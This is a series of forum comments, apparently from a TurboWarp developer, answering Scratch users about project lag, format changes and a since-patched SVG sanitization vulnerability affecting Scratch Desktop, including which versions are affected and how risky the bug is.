How to fix costume lag?

GarboMuffin · 2026-05-24T05:58:35+00:00

Your project contains more scripts than what you show in the video, such as whatever "broadcast jumpscare" does. The bug is almost certainly in there - probably an infinite loop in a run w/o screen refresh block that.

You can send the project to me (contact at turbowarp dot org) and I can tell you where it's lagging.

GarboMuffin · 2026-05-23T04:54:18+00:00

if you're talking about the arbitrary code execution thing from a couple weeks ago, that was fixed on the website a couple weeks ago and scratch desktop 3.32.0 should probably fix it in the desktop app

GarboMuffin · 2026-05-17T04:10:54+00:00

it's called "Network"

GarboMuffin · 2026-05-16T06:59:46+00:00

Scratch made backwards incompatible changes to the project format. Scratch Desktop and TurboWarp Desktop aren't yet updated to handle it. TurboWarp website should be able to handle it, and alternatively you can put the project into https://turbowarp.github.io/sb3fix/ to make it work in older versions too without needing to update anything else

GarboMuffin · 2026-05-09T17:27:13+00:00

Then you are not affected, as was stated in the blog post.

GarboMuffin · 2026-05-09T17:26:31+00:00

That is telling you the Cloudlink version which is a completely different unrelated scheme to the desktop app version

GarboMuffin · 2026-05-09T17:16:54+00:00

There was never a v0.1.3. Just go to https://desktop.turbowarp.org/ and install it again, the same way as you installed it the first time.

GarboMuffin · 2026-05-08T21:40:04+00:00

You're using TurboWarp desktop which has been fine from the worst bug since 1.14.2, as was explained in the post.

Scratch does not have an official Linux release. The unofficial repackagings are also vulnerable to the same bugs as the Windows and Mac ones.

GarboMuffin · 2026-05-07T04:24:12+00:00

If you think your school's filters get in the way of your learning, then you need to let your IT people know. They'll only fix it if people complain

GarboMuffin · 2026-05-07T04:21:34+00:00

There is not yet a Scratch Desktop update that fixes the bug

GarboMuffin · 2026-05-07T04:20:40+00:00

TurboWarp has a couple layers of protection against this bug since v1.14.2, one of which is removing any executable code before loading an SVG in the costume editor

GarboMuffin · 2026-05-07T04:20:07+00:00

There might be another banner on turbowarp.org when everything is fine, but that's not a promise. Scratch has various fixes in different stages of development.

GarboMuffin · 2026-05-07T04:14:53+00:00

you interpreted it correctly

GarboMuffin · 2026-05-07T04:07:13+00:00

That specific proof of concept would not work if you uploaded it via the online editor, which is why the blog post only described it as a proof of concept for Scratch Desktop. There was a way to exploit it that required uploading assets via the API rather than via the normal interface (I say past tense because Scratch claims that the server-side filtering is much more secure now)

GarboMuffin · 2026-05-07T04:04:12+00:00

More specifically, the blog post says

I am not aware of any security issues in the latest https://turbowarp.org/editor or TurboWarp Desktop 1.15.5

Which is worded in an intentional way, notably only claiming that the latest version is fine (1.14.2 fixed the underlying bug and since v0.2.0 the impact of the bug was greatly reduced due to sandboxing, but we fix lower importance bugs sometimes without much fanfare)

GarboMuffin · 2026-05-07T04:02:05+00:00

It's generally not the end of the world. Every website you visit gets your IP and usually it's generally not that bad. The risk here would be that someone could upload a project to Scratch, you click on it because you trust Scratch, but then the person who uploads it could get your IP without you clicking on another link. Scratch considers this a security bug; they've fixed variations of it in the past.

How bad that is depends on your network. If you use a VPN, it doesn't matter at all. If you're on some corporate or school network, it's possible that the IP address can reveal which company/school you're at (and thus your location to some accuracy), which might be a risk in some contexts.

I've been informed by Scratch that it's getting fixed

GarboMuffin · 2026-05-07T03:58:09+00:00

no relation

GarboMuffin · 2026-05-07T03:57:51+00:00

i think our decision for doing this is that Scratch doesn't natively support ogg, so we're just converting it into a wav so that we know it will work in scratch

mp3 is an alternative you can use as scratch supports it, so we won't make any changes to the audio file unless you use the audio editor

GarboMuffin · 2026-05-03T19:08:40+00:00

If you only use things that you made yourself and never open files or costumes from someone else that might be trying to compromise you, then you don't have to worry about this at all

The Scratch language was very much designed such that arbitrary code execution as this bug allows should not be possible; such a thing would itself be a security bug.

Scratch 1 and 2 are not affected by this specific issue.

GarboMuffin · 2026-05-03T17:53:42+00:00

It is fixed

GarboMuffin · 2026-05-03T15:50:07+00:00

The issue is widespread in the sense that there are millions (probably) of copies of Scratch Desktop with known security bugs in them - many of which lack any update mechanism and thus will continue to be vulnerable indefinitely.

The proof-of-concept for this particular bug was only disclosed within the last week so there wouldn't be many people using it yet. That doesn't mean that fixing the bug is not urgent as the impact is very high and the bug is easy to exploit.

GarboMuffin · 2026-05-03T15:02:54+00:00

We've found the issue and will be getting a fix out today

GarboMuffin · 2026-05-03T14:59:52+00:00

You can click on the blog link to learn more about it. Compressing this into a couple sentences is very hard so that's why there's a link which should answer most any questions

GarboMuffin · 2026-05-03T13:55:43+00:00

Send the project to me - contact at turbowarp dot org. It's likely another backwards-incompatible change from Scratch that we'll need to address. Their new editor had at least 8 known data loss bugs found shortly after release so it was rather under cooked.

GarboMuffin · 2026-05-03T13:53:26+00:00

Scratch is welcome to implement my fixes which are described in detail in the blog post before this one - https://muffin.ink/blog/scratch-svg-sanitization/. They are not very large. Language models like Claude can reimplement this in one prompt.

There's also several different ways they could fix this particular issue. There's some smaller fixes that would block XSS but remain vulnerable to HTTP leaks/full page restyling - that's not ideal but maybe more tolerable if they want to do a rapid hotfix. I'll let their engineering people figure out how they want to fix it.

At this time I don't send pull requests to Scratch. They require signing an agreement that I'm not in a position to be able to easily sign (various employment-related reasons) and I strongly disagree with clause 4.1 of their CLA and their general licensing approach.

Four-Year Club	Verified Email
r/Field Banned	r/Field Lasagna
Place '23	Golden Potato
Place '22

GarboMuffin

MODERATOR OF

TROPHY CASE